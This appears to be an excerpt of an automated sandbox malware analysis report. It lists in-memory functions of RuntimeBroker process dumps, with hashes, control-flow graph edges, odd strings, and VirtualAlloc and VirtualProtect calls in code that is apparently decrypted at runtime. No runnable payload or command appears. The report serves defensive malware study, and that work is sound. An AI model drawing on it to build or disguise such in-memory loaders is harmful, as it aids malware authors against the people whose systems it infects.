                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 0e7e175cf97396285c22854e6146864e534e7d931c707e8c46da9423c7745bed
                                                                                                                                      • Instruction ID: 137307a4737f39309217cbd5f74b224200efa8d39f77cbd41a7c2fb01baff66c
                                                                                                                                      • Opcode Fuzzy Hash: 0e7e175cf97396285c22854e6146864e534e7d931c707e8c46da9423c7745bed
                                                                                                                                      • Instruction Fuzzy Hash: 3FF0E27090E28D9FCB56EF24C9605DD7FA0FF01700F0404EAE418C31A2D63896188701
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8F0115 Relevance: .0, Instructions: 25COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 8c383320dc36de3939e30bc9c3c3823605e8bdad0fc94482ae59994e14d75add
                                                                                                                                      • Instruction ID: f69f1b71d2158b469214d0657c742171e80c331022d75109981c28a23ee493d1
                                                                                                                                      • Opcode Fuzzy Hash: 8c383320dc36de3939e30bc9c3c3823605e8bdad0fc94482ae59994e14d75add
                                                                                                                                      • Instruction Fuzzy Hash: 2EE09231A5E3CD8FD7269F6088655D93FA0FF06304F0601BAD458461E6EA68AA64C782
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8A2171 Relevance: .0, Instructions: 24COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 7027745358ea6c465e11a36333c1b85d6b7c1a98ffbd51235692b4d6728c1509
                                                                                                                                      • Instruction ID: 76d2b983cd5f965587c20a26e803c11e25a900aaf69d74df8d868e1dd179a7c6
                                                                                                                                      • Opcode Fuzzy Hash: 7027745358ea6c465e11a36333c1b85d6b7c1a98ffbd51235692b4d6728c1509
                                                                                                                                      • Instruction Fuzzy Hash: 6EF0DA70A1A51E8AE7A4DF58CD646E876A1EF95344F0041B5A01D931A5CE346E828B51
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8BE2AA Relevance: .0, Instructions: 24COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B9000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b9000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 56fd1b19120d67d706fc0fedcb072a1cc3b87b9b02c7cccbfceb384e3bfb0019
                                                                                                                                      • Instruction ID: ed5957eee798ea557f150714e7a00e03455a59e1043fc3389786902257e61b62
                                                                                                                                      • Opcode Fuzzy Hash: 56fd1b19120d67d706fc0fedcb072a1cc3b87b9b02c7cccbfceb384e3bfb0019
                                                                                                                                      • Instruction Fuzzy Hash: 9EF0DA70E4927E8EFBB09BF484583BCB7B0AF1C302F124876E41DD65A5DA3866809F44
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8EF57D Relevance: .0, Instructions: 23COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 14706d302037a835a56064fd6ebf66a0d3d0929a491f09c551a4cb9e056faddd
                                                                                                                                      • Instruction ID: dd9297c20987556587768a45f8cc38ef62f42162d893b3dbed52c41db471adc3
                                                                                                                                      • Opcode Fuzzy Hash: 14706d302037a835a56064fd6ebf66a0d3d0929a491f09c551a4cb9e056faddd
                                                                                                                                      • Instruction Fuzzy Hash: 0DF0FE30A0450D8FE718EF84C4647F877B1EB58329F144139C41AA72E1DA79A584CB14
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8E9C9D Relevance: .0, Instructions: 23COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d6d733435f991f0cc0da8d1f399e6a4d5537f7b2f8b3e938a17e1c481873a479
                                                                                                                                      • Instruction ID: b10c1d0595380bbbee036865eb00c38860bb90c9a9dbe4d2d49457c932e2b76b
                                                                                                                                      • Opcode Fuzzy Hash: d6d733435f991f0cc0da8d1f399e6a4d5537f7b2f8b3e938a17e1c481873a479
                                                                                                                                      • Instruction Fuzzy Hash: F3F0F830A0411D8FEB69EF80C8587ED77B2FB98324F100739C40AA7291DBBDA984CB44
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8AA1E2 Relevance: .0, Instructions: 22COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8A6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A6000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8a6000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 7fcb34bdd9a894c83ef5c10ad9576a671bbdb11f35becdd2cf3460e1dbe0b489
                                                                                                                                      • Instruction ID: 4958ac8ef5c1a4060583369a91490e45884f938fd6ff829a684f21022f0c9a47
                                                                                                                                      • Opcode Fuzzy Hash: 7fcb34bdd9a894c83ef5c10ad9576a671bbdb11f35becdd2cf3460e1dbe0b489
                                                                                                                                      • Instruction Fuzzy Hash: DBF0DA70D0A22D8EFBB4AB64C858BE9B6B0EB58300F1110F8C14D92391DA396AC4CE11
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8BD94E Relevance: .0, Instructions: 18COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B9000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b9000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d3ed2d97c493495135112dcff0f7bd9b96759dedbb195bd54760dface4de44d8
                                                                                                                                      • Instruction ID: f1b045289e1bf32cbaf9530f23889fd6b2c952973d4cc6e3c77cb666a6bd7b6c
                                                                                                                                      • Opcode Fuzzy Hash: d3ed2d97c493495135112dcff0f7bd9b96759dedbb195bd54760dface4de44d8
                                                                                                                                      • Instruction Fuzzy Hash: A9E04F60A0460E8BFB64DF98C8655AD7BB1EF54204F000136C41E97195DE342542C781
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Non-executed Functions

                                                                                                                                      Function 00007FFD9B8B4E90 Relevance: 5.1, Strings: 4, Instructions: 63COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B4000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b4000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: %$($)$+
                                                                                                                                      • API String ID: 0-687716160
                                                                                                                                      • Opcode ID: 58593eb16b360ccfe4db0ce9ab0444165620268310eb22ead1f0f1aa10789aed
                                                                                                                                      • Instruction ID: 1556f07af3fffc96a450923c9b0ed64b1891c668d7e4bdf6cbfda6c50a434656
                                                                                                                                      • Opcode Fuzzy Hash: 58593eb16b360ccfe4db0ce9ab0444165620268310eb22ead1f0f1aa10789aed
                                                                                                                                      • Instruction Fuzzy Hash: 6F210730E0662D8FEBB5DF54C8A47E9B7B5EB49301F1041E9C00DA2291DB745BC88F44
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:4.7%
                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                      Signature Coverage:0%
                                                                                                                                      Total number of Nodes:7
                                                                                                                                      Total number of Limit Nodes:0
                                                                                                                                      execution_graph 16252 7ffd9b8903fe 16253 7ffd9b89040d VirtualProtect 16252->16253 16255 7ffd9b89054d 16253->16255 16248 7ffd9b891ae1 16249 7ffd9b891aff 16248->16249 16250 7ffd9b891efd VirtualAlloc 16249->16250 16251 7ffd9b891f55 16250->16251

                                                                                                                                      Executed Functions

                                                                                                                                      Function 00007FFD9B899FAF Relevance: 5.1, Strings: 3, Instructions: 1359COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 0 7ffd9b899faf-7ffd9b89a15c 15 7ffd9b89a882-7ffd9b89a88f 0->15 16 7ffd9b89a895-7ffd9b89a8d7 15->16 17 7ffd9b89a161-7ffd9b89a16f 15->17 25 7ffd9b89a994-7ffd9b89a99a 16->25 19 7ffd9b89a176-7ffd9b89a25c 17->19 20 7ffd9b89a171 17->20 38 7ffd9b89a25e-7ffd9b89a287 19->38 39 7ffd9b89a28d-7ffd9b89a2e7 19->39 20->19 27 7ffd9b89a8dc-7ffd9b89a939 25->27 28 7ffd9b89a9a0-7ffd9b89a9e2 25->28 41 7ffd9b89a966-7ffd9b89a991 27->41 42 7ffd9b89a93b-7ffd9b89a93f 27->42 40 7ffd9b89ac04-7ffd9b89ac0a 28->40 38->39 61 7ffd9b89a2f6-7ffd9b89a34b 39->61 62 7ffd9b89a2e9-7ffd9b89a2f1 39->62 43 7ffd9b89a9e7-7ffd9b89ab2f 40->43 44 7ffd9b89ac10-7ffd9b89ac69 40->44 41->25 42->41 45 7ffd9b89a941-7ffd9b89a963 42->45 97 7ffd9b89ab95-7ffd9b89ab99 43->97 98 7ffd9b89ab31-7ffd9b89ab93 43->98 53 7ffd9b89acf8-7ffd9b89ad06 44->53 54 7ffd9b89ac6f-7ffd9b89acbb 44->54 45->41 60 7ffd9b89ad0d-7ffd9b89ad4f 53->60 54->53 74 7ffd9b89b137-7ffd9b89b13d 60->74 77 7ffd9b89a35a-7ffd9b89a3af 61->77 78 7ffd9b89a34d-7ffd9b89a355 61->78 63 7ffd9b89a86d-7ffd9b89a87f 62->63 63->15 79 7ffd9b89ad54-7ffd9b89add4 74->79 80 7ffd9b89b143-7ffd9b89b177 call 7ffd9b89c00a 74->80 105 7ffd9b89a3be-7ffd9b89a413 77->105 106 7ffd9b89a3b1-7ffd9b89a3b9 77->106 78->63 94 7ffd9b89add6-7ffd9b89ade2 79->94 95 7ffd9b89ae04-7ffd9b89ae13 79->95 99 7ffd9b89b179-7ffd9b89b187 80->99 110 7ffd9b89ae31-7ffd9b89ae39 94->110 111 7ffd9b89ade4-7ffd9b89adf9 94->111 103 7ffd9b89ae15 95->103 104 7ffd9b89ae1a-7ffd9b89ae29 95->104 100 7ffd9b89ab9b-7ffd9b89abcd 97->100 101 7ffd9b89abcf-7ffd9b89abe2 97->101 121 7ffd9b89abe3-7ffd9b89ac01 98->121 114 7ffd9b89b192-7ffd9b89b21b 99->114 100->121 101->121 103->104 108 7ffd9b89ae2b-7ffd9b89ae2c 104->108 109 7ffd9b89ae3e-7ffd9b89ae59 104->109 133 7ffd9b89a415-7ffd9b89a41d 105->133 134 7ffd9b89a422-7ffd9b89a477 105->134 106->63 108->110 115 7ffd9b89ae79-7ffd9b89b0dd 109->115 116 7ffd9b89ae5b-7ffd9b89ae75 109->116 113 7ffd9b89b116-7ffd9b89b134 110->113 111->95 113->74 137 7ffd9b89b221-7ffd9b89b2aa 114->137 138 7ffd9b89b2b3-7ffd9b89b2d5 114->138 128 7ffd9b89b12c-7ffd9b89b134 115->128 129 7ffd9b89b0df-7ffd9b89b10b 115->129 116->115 121->40 128->74 129->113 133->63 153 7ffd9b89a486-7ffd9b89a4db 134->153 154 7ffd9b89a479-7ffd9b89a481 134->154 137->138 167 7ffd9b89b2ac 137->167 143 7ffd9b89b426-7ffd9b89b4bc 138->143 144 7ffd9b89b2db-7ffd9b89b326 138->144 169 7ffd9b89b57f-7ffd9b89b5c5 143->169 170 7ffd9b89b4c2-7ffd9b89b4ce 143->170 159 7ffd9b89b40d-7ffd9b89b41a 144->159 179 7ffd9b89a4ea-7ffd9b89a53f 153->179 180 7ffd9b89a4dd-7ffd9b89a4e5 153->180 154->63 161 7ffd9b89b32b-7ffd9b89b339 159->161 162 7ffd9b89b420-7ffd9b89b421 159->162 164 7ffd9b89b33b 161->164 165 7ffd9b89b340-7ffd9b89b3a2 161->165 163 7ffd9b89b734-7ffd9b89b793 162->163 190 7ffd9b89ba5b-7ffd9b89ba88 163->190 164->165 177 7ffd9b89b3a9-7ffd9b89b3fb 165->177 178 7ffd9b89b3a4 165->178 167->138 191 7ffd9b89b5cc-7ffd9b89b5d2 169->191 181 7ffd9b89b51d-7ffd9b89b57d call 7ffd9b899a58 170->181 182 7ffd9b89b4d0-7ffd9b89b51c 170->182 205 7ffd9b89b405-7ffd9b89b40a 177->205 206 7ffd9b89b3fd-7ffd9b89b402 177->206 178->177 208 7ffd9b89a54e-7ffd9b89a5a3 179->208 209 7ffd9b89a541-7ffd9b89a549 179->209 180->63 181->191 182->181 199 7ffd9b89b798-7ffd9b89b7d4 190->199 200 7ffd9b89ba8e-7ffd9b89bab2 call 7ffd9b89c043 190->200 195 7ffd9b89b721-7ffd9b89b72e 191->195 195->163 197 7ffd9b89b5d7-7ffd9b89b5e5 195->197 201 7ffd9b89b5e7 197->201 202 7ffd9b89b5ec-7ffd9b89b646 197->202 214 7ffd9b89b7d6-7ffd9b89b7ed 199->214 215 7ffd9b89b7f1-7ffd9b89ba58 199->215 228 7ffd9b89babb-7ffd9b89baef 200->228 229 7ffd9b89bab4 200->229 201->202 221 7ffd9b89b6b6-7ffd9b89b6de 202->221 222 7ffd9b89b648-7ffd9b89b670 202->222 205->159 206->205 235 7ffd9b89a5a5-7ffd9b89a5ad 208->235 236 7ffd9b89a5b2-7ffd9b89a607 208->236 209->63 214->215 215->190 226 7ffd9b89b6e5-7ffd9b89b70e 221->226 227 7ffd9b89b6e0 221->227 224 7ffd9b89b677-7ffd9b89b6b4 222->224 225 7ffd9b89b672 222->225 241 7ffd9b89b719-7ffd9b89b71e 224->241 225->224 226->241 227->226 233 7ffd9b89bb0f-7ffd9b89bb35 228->233 234 7ffd9b89baf1-7ffd9b89bafe 228->234 229->228 238 7ffd9b89bb05-7ffd9b89bb0d 234->238 239 7ffd9b89bb00 234->239 235->63 246 7ffd9b89a616-7ffd9b89a66b 236->246 247 7ffd9b89a609-7ffd9b89a611 236->247 238->233 239->238 241->195 251 7ffd9b89a67a-7ffd9b89a6cf 246->251 252 7ffd9b89a66d-7ffd9b89a675 246->252 247->63 256 7ffd9b89a6de-7ffd9b89a733 251->256 257 7ffd9b89a6d1-7ffd9b89a6d9 251->257 252->63 261 7ffd9b89a735-7ffd9b89a73d 256->261 262 7ffd9b89a742-7ffd9b89a797 256->262 257->63 261->63 266 7ffd9b89a7a6-7ffd9b89a7fb 262->266 267 7ffd9b89a799-7ffd9b89a7a1 262->267 271 7ffd9b89a807-7ffd9b89a85c 266->271 272 7ffd9b89a7fd-7ffd9b89a805 266->272 267->63 276 7ffd9b89a868-7ffd9b89a86a 271->276 277 7ffd9b89a85e-7ffd9b89a866 271->277 272->63 276->63 277->63
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b899000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 2$H$zM_H
                                                                                                                                      • API String ID: 0-2006335857
                                                                                                                                      • Opcode ID: 49c6132d6aa94f3c22bb0ad86142398b86d7a05ea1ee8c19f6c17e60af44ce87
                                                                                                                                      • Instruction ID: 772cd3fedbf1b9281d63cd757ace2fcd2a8ad54c3ba5b3a9c4b90e60662f46ca
                                                                                                                                      • Opcode Fuzzy Hash: 49c6132d6aa94f3c22bb0ad86142398b86d7a05ea1ee8c19f6c17e60af44ce87
                                                                                                                                      • Instruction Fuzzy Hash: 98C2D574E1992D8FDBA8DB58C8A4BA9B7B5FF58300F5041E9D00DE72A5DB346A81CF00
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8C312D Relevance: 1.8, Strings: 1, Instructions: 515COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 325 7ffd9b8c312d-7ffd9b8c314c 327 7ffd9b8c3196-7ffd9b8c323a 325->327 328 7ffd9b8c314e-7ffd9b8c3182 325->328 332 7ffd9b8c323c-7ffd9b8c3241 327->332 333 7ffd9b8c3244-7ffd9b8c324d 327->333 330 7ffd9b8c3189-7ffd9b8c3190 328->330 331 7ffd9b8c3184 328->331 330->327 331->330 332->333 334 7ffd9b8c36dd-7ffd9b8c36e3 333->334 335 7ffd9b8c36e9-7ffd9b8c3702 334->335 336 7ffd9b8c3252-7ffd9b8c327c 334->336 337 7ffd9b8c327e 336->337 338 7ffd9b8c3283-7ffd9b8c329c 336->338 337->338 339 7ffd9b8c329e 338->339 340 7ffd9b8c32a3-7ffd9b8c32bd 338->340 339->340 342 7ffd9b8c32bf 340->342 343 7ffd9b8c32c4-7ffd9b8c32dc 340->343 342->343 344 7ffd9b8c32de 343->344 345 7ffd9b8c32e3-7ffd9b8c3304 343->345 344->345 346 7ffd9b8c3306-7ffd9b8c330a 345->346 347 7ffd9b8c3372-7ffd9b8c338f 345->347 346->347 348 7ffd9b8c330c-7ffd9b8c3320 346->348 349 7ffd9b8c3396-7ffd9b8c33af 347->349 350 7ffd9b8c3391 347->350 353 7ffd9b8c3364-7ffd9b8c336a 348->353 351 7ffd9b8c33b6-7ffd9b8c33d0 349->351 352 7ffd9b8c33b1 349->352 350->349 354 7ffd9b8c33d7-7ffd9b8c33ef 351->354 355 7ffd9b8c33d2 351->355 352->351 356 7ffd9b8c336c-7ffd9b8c336d 353->356 357 7ffd9b8c3322-7ffd9b8c3326 353->357 360 7ffd9b8c33f6-7ffd9b8c3400 354->360 361 7ffd9b8c33f1 354->361 355->354 362 7ffd9b8c3403-7ffd9b8c343a 356->362 358 7ffd9b8c3328-7ffd9b8c332e 357->358 359 7ffd9b8c3331-7ffd9b8c3347 357->359 358->359 363 7ffd9b8c3349 359->363 364 7ffd9b8c334e-7ffd9b8c3361 359->364 360->362 361->360 365 7ffd9b8c343c-7ffd9b8c3441 362->365 366 7ffd9b8c3444-7ffd9b8c3520 362->366 363->364 364->353 365->366 367 7ffd9b8c352a-7ffd9b8c359f 366->367 368 7ffd9b8c3522-7ffd9b8c3527 366->368 369 7ffd9b8c35f8-7ffd9b8c35fc 367->369 370 7ffd9b8c35a1-7ffd9b8c35ba 367->370 368->367 373 7ffd9b8c35fe 369->373 374 7ffd9b8c3603-7ffd9b8c361c 369->374 371 7ffd9b8c35bc-7ffd9b8c35c0 370->371 372 7ffd9b8c362d-7ffd9b8c3644 370->372 371->372 375 7ffd9b8c35c2-7ffd9b8c35d1 371->375 377 7ffd9b8c3646 372->377 378 7ffd9b8c364b-7ffd9b8c3665 372->378 373->374 376 7ffd9b8c361f-7ffd9b8c3625 374->376 375->376 379 7ffd9b8c3627-7ffd9b8c3628 376->379 380 7ffd9b8c35d3-7ffd9b8c35d7 376->380 377->378 381 7ffd9b8c3667 378->381 382 7ffd9b8c366c-7ffd9b8c3690 378->382 387 7ffd9b8c36d5-7ffd9b8c36da 379->387 385 7ffd9b8c35eb-7ffd9b8c35f2 380->385 386 7ffd9b8c35d9-7ffd9b8c35e8 380->386 381->382 383 7ffd9b8c3697-7ffd9b8c36bb 382->383 384 7ffd9b8c3692 382->384 388 7ffd9b8c36bd 383->388 389 7ffd9b8c36c2-7ffd9b8c36d3 383->389 384->383 385->369 386->385 387->334 388->389 389->387
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Em>N
                                                                                                                                      • API String ID: 0-488659082
                                                                                                                                      • Opcode ID: b65a4ca07ed3524415034d2b8f00276c625ea7f4bb9d10145d21e9a932652bfa
                                                                                                                                      • Instruction ID: 1aa7823e88dfdf99c43969f2eb529241b019625da832ce86d849f5d65594c7fc
                                                                                                                                      • Opcode Fuzzy Hash: b65a4ca07ed3524415034d2b8f00276c625ea7f4bb9d10145d21e9a932652bfa
                                                                                                                                      • Instruction Fuzzy Hash: 25222670E0421D8FDB58DFA8C895AEDBBB2FF48300F14866AD419EB255DB34A981CF50
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B880DA8 Relevance: .3, Instructions: 286COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b880000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 07bf76c8bfe0f2d56b070015da5b28aaf0b5db1b0c595e5f7befc21b8f9dbd97
                                                                                                                                      • Instruction ID: a2a03dc256ee9c6bd7f7e4468da5a6429fb156f4fee44543962a4f0537987b0e
                                                                                                                                      • Opcode Fuzzy Hash: 07bf76c8bfe0f2d56b070015da5b28aaf0b5db1b0c595e5f7befc21b8f9dbd97
                                                                                                                                      • Instruction Fuzzy Hash: 5CA1DE71A19A4D8FE799DF6CC8647A97BE1FFA9300F4001BED059D72E6CBB828418741
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B891AE1 Relevance: 1.8, APIs: 1, Instructions: 520memoryCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 278 7ffd9b891ae1-7ffd9b891b15 280 7ffd9b891b17 278->280 281 7ffd9b891b1c-7ffd9b891b6b 278->281 280->281 284 7ffd9b891b6d 281->284 285 7ffd9b891b72-7ffd9b891bbb 281->285 284->285 288 7ffd9b891bbd 285->288 289 7ffd9b891bc2-7ffd9b891c15 285->289 288->289 292 7ffd9b891c17 289->292 293 7ffd9b891c1c-7ffd9b891c69 289->293 292->293 296 7ffd9b891c6b 293->296 297 7ffd9b891c70-7ffd9b891cc0 293->297 296->297 300 7ffd9b891cc7-7ffd9b891d38 297->300 301 7ffd9b891cc2 297->301 304 7ffd9b891d3a 300->304 305 7ffd9b891d3f-7ffd9b891d48 300->305 301->300 304->305 306 7ffd9b891dda-7ffd9b891f53 VirtualAlloc 305->306 307 7ffd9b891d4e-7ffd9b891dae call 7ffd9b88fe40 305->307 317 7ffd9b891f55 306->317 318 7ffd9b891f5b-7ffd9b891fbf 306->318 323 7ffd9b891db6-7ffd9b891dd3 307->323 317->318 323->306
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B88F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B88F000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b88f000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                      • Opcode ID: 4929bb282011be55a0b5ab00ca8df570db7243428d03077239a2d82ac6cf1bcd
                                                                                                                                      • Instruction ID: 4c59da471a0bd60a39dc161245082a13382cf0cdbd4107587817c0317a87b87a
                                                                                                                                      • Opcode Fuzzy Hash: 4929bb282011be55a0b5ab00ca8df570db7243428d03077239a2d82ac6cf1bcd
                                                                                                                                      • Instruction Fuzzy Hash: 60029E3090DA8D8FDF95EF68C855AE97BF1FF59300F0141AAE448D72A2DB34A985CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8903FE Relevance: 1.7, APIs: 1, Instructions: 190memoryCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 390 7ffd9b8903fe-7ffd9b89040b 391 7ffd9b890416-7ffd9b890427 390->391 392 7ffd9b89040d-7ffd9b890415 390->392 393 7ffd9b890429-7ffd9b890431 391->393 394 7ffd9b890432-7ffd9b89054b VirtualProtect 391->394 392->391 393->394 399 7ffd9b89054d 394->399 400 7ffd9b890553-7ffd9b8905a3 394->400 399->400
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B88F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B88F000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b88f000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                      • Opcode ID: 9b83865c25587fa3ca2f9dab4e3e08f9581a2cfdc5c32e1181a0cbf12bf8a22f
                                                                                                                                      • Instruction ID: 605fa173f2b3929a505135a45bcb3001d5fad243aa1ee5d40a56158ae7331512
                                                                                                                                      • Opcode Fuzzy Hash: 9b83865c25587fa3ca2f9dab4e3e08f9581a2cfdc5c32e1181a0cbf12bf8a22f
                                                                                                                                      • Instruction Fuzzy Hash: 21517E70D0864D8FDF54DFA8C845AEDBBF0FB6A310F1042AAD449E3256DB74A885CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B894A02 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
